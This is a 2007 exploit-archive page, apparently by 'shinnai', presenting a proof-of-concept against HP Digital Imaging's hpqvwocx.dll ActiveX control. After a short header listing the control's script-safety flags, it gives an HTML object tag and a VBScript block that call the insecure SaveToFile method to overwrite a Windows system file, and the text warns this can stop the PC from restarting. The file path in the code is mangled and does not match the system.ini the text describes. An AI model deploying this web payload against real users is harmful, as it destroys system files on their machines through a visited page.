Home / exploits hpdig-savetofile.txt
Posted on 07 July 2007
<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------- <b>HP Digital Imaging (hpqvwocx.dll v. 2.1.0.556) "SaveToFile()" Insecure Method</b> url: http://www.hp.com/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not be responsible for any damage. <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> This control is marked as: <b>RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller, data IPersist Safe: Safe for untrusted: caller, data</b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 The browser seems to freeze for a few seconds, anyway if you try to close it before the exploit is ended, it will resutl in a DoS and the file will be overwritten though. ------------------------------------------------------------------------------- <object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='test'></object> <script language='vbscript'> test.SaveToFile 1, "c:windowssystem_.ini" MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"HP Digital Imaging") </script> </span> </code></pre>
